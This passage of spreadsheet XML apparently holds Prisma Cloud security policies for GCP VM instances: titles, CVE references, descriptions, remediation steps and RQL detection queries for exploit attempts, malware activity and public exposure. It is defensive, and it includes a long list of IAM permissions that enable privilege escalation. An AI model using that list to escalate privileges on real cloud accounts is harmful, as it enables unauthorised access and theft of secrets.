          <t>asset where asset.type IN ( 'gcloud-compute-instances-list' ) and finding.name contains all ('Shellshock payload detected in HTTP traffic','GCP Compute Engine with IAM write access level') AND with : ( Vuln WHERE severity greater than or equal to high )</t>
        </is>
      </c>
      <c r="AA2814" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2814" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:56</t>
        </is>
      </c>
      <c r="AC2814" t="inlineStr"/>
      <c r="AD2814" t="b">
        <v>1</v>
      </c>
      <c r="AE2814" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2814" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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14" t="inlineStr">
        <is>
          <t>b175d289-6c55-499c-beb0-10cc5f9b753e</t>
        </is>
      </c>
      <c r="AI2814" t="inlineStr">
        <is>
          <t>816fe4d1-b147-4102-87c2-80b1083e86ca</t>
        </is>
      </c>
      <c r="AJ2814" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2814" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2815">
      <c r="A2815" t="inlineStr"/>
      <c r="B2815" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2815" s="2" t="inlineStr"/>
      <c r="D2815" t="inlineStr"/>
      <c r="E2815" t="inlineStr"/>
      <c r="F2815" t="inlineStr"/>
      <c r="G2815" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2815" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2815" t="inlineStr">
        <is>
          <t>Command execution risk due to publicly exposed and vulnerable GCP VM instance (Apache RocketMQ, CVE-2023-33246)</t>
        </is>
      </c>
      <c r="L2815" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2815" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2815" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2815" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2815" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2815" t="inlineStr"/>
      <c r="R2815" t="inlineStr"/>
      <c r="S2815" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2815" t="b">
        <v>0</v>
      </c>
      <c r="U2815" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2815" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2815" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instance that are publicly exposed and have known exploitable Command execution vulnerability (CVE-2023-33246).
Command execution vulnerability would allow an attacker to execute arbitrary commands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RocketMQ Command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RocketMQ (CVE-2023-33246) vulnerability and public exposure reported for the affected GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X281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CVE-2023-33246
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-33246</t>
        </is>
      </c>
      <c r="Y2815" t="inlineStr"/>
      <c r="Z2815" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-33246'))</t>
        </is>
      </c>
      <c r="AA2815" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2815" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:17</t>
        </is>
      </c>
      <c r="AC2815" t="inlineStr"/>
      <c r="AD2815" t="b">
        <v>1</v>
      </c>
      <c r="AE2815" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2815" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>cbf01eca-08c9-4cc0-b5ca-58d044447083</t>
        </is>
      </c>
      <c r="AI2815" t="inlineStr">
        <is>
          <t>a6eafef0-c5ee-4728-96c1-6e04f4fff2ab</t>
        </is>
      </c>
      <c r="AJ2815" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2815" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2816">
      <c r="A2816" t="inlineStr"/>
      <c r="B2816" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2816" s="2" t="inlineStr"/>
      <c r="D2816" t="inlineStr"/>
      <c r="E2816" t="inlineStr"/>
      <c r="F2816" t="inlineStr"/>
      <c r="G2816" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2816" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2816" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) or Denial of Service (DoS) exploitation attempt on GCP VM with known exploitable vulnerability [MS15-034 Microsoft IIS, CVE-2015-1635]</t>
        </is>
      </c>
      <c r="L2816" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2816" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2816" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2816" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2816" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2816" t="inlineStr"/>
      <c r="R2816" t="inlineStr"/>
      <c r="S2816" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2816" t="b">
        <v>0</v>
      </c>
      <c r="U2816" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2816" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2816" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to either Remote Code Execution (RCE) or Denial of Service (DoS) with exploits in the wild [MS15-034 Microsoft IIS, CVE-2015-1635].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version exposed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the MS15-034 Microsoft IIS vulnerability [CVE-2015-1635] reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X2816"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CVE-2015-1635
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2015-1635</t>
        </is>
      </c>
      <c r="Y2816" t="inlineStr"/>
      <c r="Z2816" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2015-1635 - MS15-034 Microsoft IIS DoS or RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2015-1635'))</t>
        </is>
      </c>
      <c r="AA2816" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2816" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:38</t>
        </is>
      </c>
      <c r="AC2816" t="inlineStr"/>
      <c r="AD2816" t="b">
        <v>1</v>
      </c>
      <c r="AE2816" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2816" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>87926dd2-7945-4097-b540-0d674211aaae</t>
        </is>
      </c>
      <c r="AI2816" t="inlineStr">
        <is>
          <t>7be2a7ce-5e0d-4c52-b8eb-3de6009badf5</t>
        </is>
      </c>
      <c r="AJ2816" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2816" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2817">
      <c r="A2817" t="inlineStr"/>
      <c r="B2817" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2817" s="2" t="inlineStr"/>
      <c r="D2817" t="inlineStr"/>
      <c r="E2817" t="inlineStr"/>
      <c r="F2817" t="inlineStr"/>
      <c r="G2817" t="b">
        <v>1</v>
      </c>
      <c r="H28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17" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2817" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2817" t="inlineStr">
        <is>
          <t>Secrets exposure risk due to publicly exposed and vulnerable GCP VM instance containing secrets and having risky IAM write permissions</t>
        </is>
      </c>
      <c r="L2817" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2817" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2817" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2817" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2817" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2817" t="inlineStr"/>
      <c r="R2817" t="inlineStr"/>
      <c r="S2817" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2817" t="b">
        <v>0</v>
      </c>
      <c r="U2817" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2817" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2817" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed and vulnerable GCP VM instances containing secrets and having risky IAM write permissions.
A publicly exposed and vulnerable GCP VM instance could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. The risky IAM write permissions along with secrets on the instance, which further helps the attackers escalate their privileges and perform unauthorised actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation: 
'accessapproval.requests.approve', 'accessapproval.requests.dismiss', 'accessapproval.settings.delete', 'accessapproval.settings.update', 'accesscontextmanager.accessLevels.create', 'accesscontextmanager.accessLevels.delete', 'accesscontextmanager.accessLevels.replaceAll', 'accesscontextmanager.accessLevels.update', 'accesscontextmanager.accessPolicies.create', 'accesscontextmanager.accessPolicies.delete', 'accesscontextmanager.accessPolicies.setIamPolicy', 'accesscontextmanager.accessPolicies.update', 'accesscontextmanager.gcpUserAccessBindings.create', 'accesscontextmanager.gcpUserAccessBindings.delete', 'accesscontextmanager.gcpUserAccessBindings.update', 'accesscontextmanager.policies.create', 'accesscontextmanager.policies.delete', 'accesscontextmanager.policies.setIamPolicy', 'accesscontextmanager.policies.update', 'iam.roles.create', 'iam.roles.delete', 'iam.roles.undelete',  'iam.roles.update', 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccountKeys.create', 'iam.serviceAccountKeys.delete', 'iam.serviceAccounts.create', 'iam.serviceAccounts.delete', 'iam.serviceAccounts.disable', 'iam.serviceAccounts.enable', 'iam.serviceAccounts.setIamPolicy', 'iam.serviceAccounts.undelete', 'iam.serviceAccounts.update', 'iam.serviceAccounts.implicitDelegation', 'iam.serviceAccounts.signBlob', 'iam.serviceAccounts.signJwt', 'iam.serviceAccounts.actAs', 'compute.backendServices.setIamPolicy', 'compute.disks.removeResourcePolicies', 'compute.disks.setIamPolicy', 'compute.firewallPolicies.setIamPolicy', 'compute.globalOperations.setIamPolicy', 'compute.images.setIamPolicy', 'compute.instanceTemplates.setIamPolicy', 'compute.instances.removeResourcePolicies', 'compute.instances.setIamPolicy', 'compute.instances.setServiceAccount', 'compute.machineImages.setIamPolicy', 'compute.maintenancePolicies.setIamPolicy', 'compute.snapshots.setIamPolicy'
Immediate attention is required to grant the least privileges required, remove unwanted risky permissions assigned to the VM instance, remediate critical and high vulnerabilities, remove secrets, and restrict public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X2817"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to the trusted IP address
8. Click 'Save rules' to apply the changes
[SECRETS_EXPOSURE]
Including sensitive secrets in a host filesystem poses significant security risks. It can lead to privilege escalation, unauthorised access, and application disruptions. Maintain a secure environment by removing secrets from hosts.
[PERMISSION]
Remediation steps:
1. Log in to the GCP console
2. Navigate to the Compute Engine instance 
3. Find the service account used by the Compute Engine instance
4. Navigate to the IAM service
5. Find the binding between the service account used by the Compute Engine instance and the role with risky permissions
6. Remove the binding
7. Create a new binding with predefined or custom role without risky permissions, if necessary.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17" t="inlineStr"/>
      <c r="Z2817" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'gcloud-compute-instances-list' ) and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)','GCP Compute Engine with IAM write access level') AND with : (Vuln WHERE severity greater than or equal to high) AND has : (secret WHERE secret.type in ('GCP Service Account Auth Key'))</t>
        </is>
      </c>
      <c r="AA2817" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2817" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:50</t>
        </is>
      </c>
      <c r="AC2817" t="inlineStr"/>
      <c r="AD2817" t="b">
        <v>1</v>
      </c>
      <c r="AE2817" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2817" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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17" t="inlineStr">
        <is>
          <t>64370e12-c487-4cd2-b5f0-d28c530a0605</t>
        </is>
      </c>
      <c r="AI2817" t="inlineStr">
        <is>
          <t>eca28098-24b1-4c61-a623-03ceacb2578f</t>
        </is>
      </c>
      <c r="AJ2817" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2817" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2818">
      <c r="A2818" t="inlineStr"/>
      <c r="B2818" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2818" s="2" t="inlineStr"/>
      <c r="D2818" t="n">
        <v>2</v>
      </c>
      <c r="E2818" t="n">
        <v>0</v>
      </c>
      <c r="F2818" t="n">
        <v>0</v>
      </c>
      <c r="G2818" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2818" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2818" t="inlineStr">
        <is>
          <t>Potentially nefarious malware activity detected on a publicly exposed and vulnerable GCP VM instance</t>
        </is>
      </c>
      <c r="L2818" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2818" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2818" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2818" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2818" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2818" t="inlineStr"/>
      <c r="R2818" t="inlineStr"/>
      <c r="S2818" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2818" t="b">
        <v>0</v>
      </c>
      <c r="U2818" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2818" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2818" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances which are publicly exposed with critical or high vulnerabilities and are connected with remote systems known for malware activities.
Malware activity includes activity from viruses, trojans, worms, ransomware, botnet, spambot and other types of malware. Attackers can exploit vulnerabilities on the VM instances to compromise the confidentiality, integrity and availability of the affected VM instances and perform malicious actions. If network connectivity with remote systems known for malware activity is observed on a publicly exposed and exploitable VM instance, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate the malware activity, remediate the critical or high vulnerabilities and restrict the public exposure reported for the VM instances as soon as possible.</t>
        </is>
      </c>
      <c r="X281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18" t="inlineStr"/>
      <c r="Z2818" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name = (('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)')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 AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2818" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2818" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2818" t="inlineStr"/>
      <c r="AD2818" t="b">
        <v>1</v>
      </c>
      <c r="AE2818" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2818" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>1cd276ea-4738-49f2-8d27-29075afcf8f4</t>
        </is>
      </c>
      <c r="AI2818" t="inlineStr">
        <is>
          <t>1c50ee9d-5e94-41c0-9c44-84e9778a6ff6</t>
        </is>
      </c>
      <c r="AJ2818" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2818" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2819">
      <c r="A2819" t="inlineStr"/>
      <c r="B2819" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2819" s="2" t="inlineStr"/>
      <c r="D2819" t="inlineStr"/>
      <c r="E2819" t="inlineStr"/>
      <c r="F2819" t="inlineStr"/>
      <c r="G2819" t="b">
        <v>1</v>
      </c>
      <c r="H28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19" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2819" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2819" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on GCP VM with known exploitable vulnerability [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26858, CVE-2021-27065]</t>
        </is>
      </c>
      <c r="L2819" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2819" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2819" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2819" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2819" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2819" t="inlineStr"/>
      <c r="R2819" t="inlineStr"/>
      <c r="S2819" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2819" t="b">
        <v>0</v>
      </c>
      <c r="U2819" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2819" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2819" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on GCP VMs that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26858, CVE-2021-27065].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable GCP VM. The fact that the GCP VM has a vulnerable version exposed makes it an easy target for an attacker to exploit these vulnerabilities.
Immediate attention is required to remediate the ProxyLogon/HAFNIUM Attack Chain vulnerabilities [CVE-2021-26858, CVE-2021-27065] reported for the GCP VM.</t>
        </is>
      </c>
      <c r="X281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CVE-2021-26858
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-26858
   https://nvd.nist.gov/vuln/detail/CVE-2021-27065</t>
        </is>
      </c>
      <c r="Y2819" t="inlineStr"/>
      <c r="Z2819" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-26858, CVE-2021-27065 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-26858', 'CVE-2021-27065'))</t>
        </is>
      </c>
      <c r="AA2819" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2819" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:37</t>
        </is>
      </c>
      <c r="AC2819" t="inlineStr"/>
      <c r="AD2819" t="b">
        <v>1</v>
      </c>
      <c r="AE2819" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2819" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG28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19" t="inlineStr">
        <is>
          <t>14836e11-4a29-47fa-83f3-7010a798c4c5</t>
        </is>
      </c>
      <c r="AI2819" t="inlineStr">
        <is>
          <t>ff4e62db-899c-451d-be8a-28a400bac47f</t>
        </is>
      </c>
      <c r="AJ2819" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2819" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2820">
      <c r="A2820" t="inlineStr"/>
      <c r="B2820" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2820" s="2" t="inlineStr"/>
      <c r="D2820" t="inlineStr"/>
      <c r="E2820" t="inlineStr"/>
      <c r="F2820" t="inlineStr"/>
      <c r="G2820" t="b">
        <v>1</v>
      </c>
      <c r="H28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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2820" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2820" t="inlineStr">
        <is>
          <t>Server Side Request Forgery (SSRF) risk due to publicly exposed and vulnerable GCP VM instance [Node.js, CVE-2020-28168]</t>
        </is>
      </c>
      <c r="L2820" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2820" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2820" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2820" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2820" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2820" t="inlineStr"/>
      <c r="R2820" t="inlineStr"/>
      <c r="S2820" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2820" t="b">
        <v>0</v>
      </c>
      <c r="U2820" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2820" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2820" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances that are publicly exposed and have known exploitable server side request forgery vulnerability [Node.js, CVE-2020-28168].
Server side request forgery vulnerability is a security flaw allowing an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. The fact that the GCP VM instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2020-28168] vulnerability and public exposure reported for the GCP VM instance as soon as possible.</t>
        </is>
      </c>
      <c r="X282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CVE-2020-28168
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2020-28168</t>
        </is>
      </c>
      <c r="Y2820" t="inlineStr"/>
      <c r="Z2820" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-compute-instances-list') and finding.name contains all ('(Disabled) GCP VM instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2020-28168'))</t>
        </is>
      </c>
      <c r="AA2820" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2820" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:49</t>
        </is>
      </c>
      <c r="AC2820" t="inlineStr"/>
      <c r="AD2820" t="b">
        <v>1</v>
      </c>
      <c r="AE2820" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2820" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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0" t="inlineStr">
        <is>
          <t>2aa6afd8-ab43-433a-9648-94b52007d857</t>
        </is>
      </c>
      <c r="AI2820" t="inlineStr">
        <is>
          <t>39073be4-905e-4fcc-a236-a1ebe09c2c70</t>
        </is>
      </c>
      <c r="AJ2820" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2820" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2821">
      <c r="A2821" t="inlineStr"/>
      <c r="B2821" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2821" s="2" t="inlineStr"/>
      <c r="D2821" t="inlineStr"/>
      <c r="E2821" t="inlineStr"/>
      <c r="F2821" t="inlineStr"/>
      <c r="G2821" t="b">
        <v>1</v>
      </c>
      <c r="H28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21" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2821" t="inlineStr">
        <is>
          <t>gcloud-compute-instances</t>
        </is>
      </c>
      <c r="K2821" t="inlineStr">
        <is>
          <t>GCP VM instance used by Vertex AI Workbench Instance</t>
        </is>
      </c>
      <c r="L2821" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2821" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2821" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2821" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2821" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2821" t="inlineStr"/>
      <c r="R2821" t="inlineStr"/>
      <c r="S2821" t="inlineStr"/>
      <c r="T2821" t="b">
        <v>0</v>
      </c>
      <c r="U2821" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2821" t="inlineStr">
        <is>
          <t>gcloud-compute-instances-list</t>
        </is>
      </c>
      <c r="W2821" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances used by Vertex AI Workbench.
Vertex AI Workbench relies on GCP Compute Engine VM instances for backend processing. The selection of the appropriate VM instance type, size, and configuration directly impacts the performance and security of the Workbench. Proper configuration of these VM instances is critical to ensuring the security of the associated Vertex AI environment.
It is recommended to regularly identify and assess the VM instances supporting Vertex AI Workbench to maintain a strong security posture and ensure compliance with best practices.</t>
        </is>
      </c>
      <c r="X2821" t="inlineStr">
        <is>
          <t>Review and validate the GCP VM instances used by Vertex AI Workbench Instances. Verify the VM instance is configured as per organizational needs.</t>
        </is>
      </c>
      <c r="Y2821" t="inlineStr"/>
      <c r="Z2821" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-compute-instances-list' AND json.rule = status equals "RUNNING" as X; config from cloud.resource where api.name = 'gcloud-vertex-ai-workbench-instance' as Y; filter ' $.Y.labels.resource-name equals $.X.labels.resource-name '; show X;</t>
        </is>
      </c>
      <c r="AA2821" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2821" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2821" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-1310</t>
        </is>
      </c>
      <c r="AD2821" t="b">
        <v>1</v>
      </c>
      <c r="AE2821" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2821" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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21" t="inlineStr">
        <is>
          <t>aef43315-4055-4ca4-a7ca-dd246d3bdde3</t>
        </is>
      </c>
      <c r="AI2821" t="inlineStr">
        <is>
          <t>c58eae8e-82b6-4289-9a05-6c1c3c1f4baa</t>
        </is>
      </c>
      <c r="AJ2821" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2821" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2822">
      <c r="A2822" t="inlineStr"/>
      <c r="B2822" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2822" s="2" t="inlineStr"/>
      <c r="D2822" t="n">
        <v>5</v>
      </c>
      <c r="E2822" t="n">
        <v>0</v>
      </c>
      <c r="F2822" t="n">
        <v>0</v>
      </c>
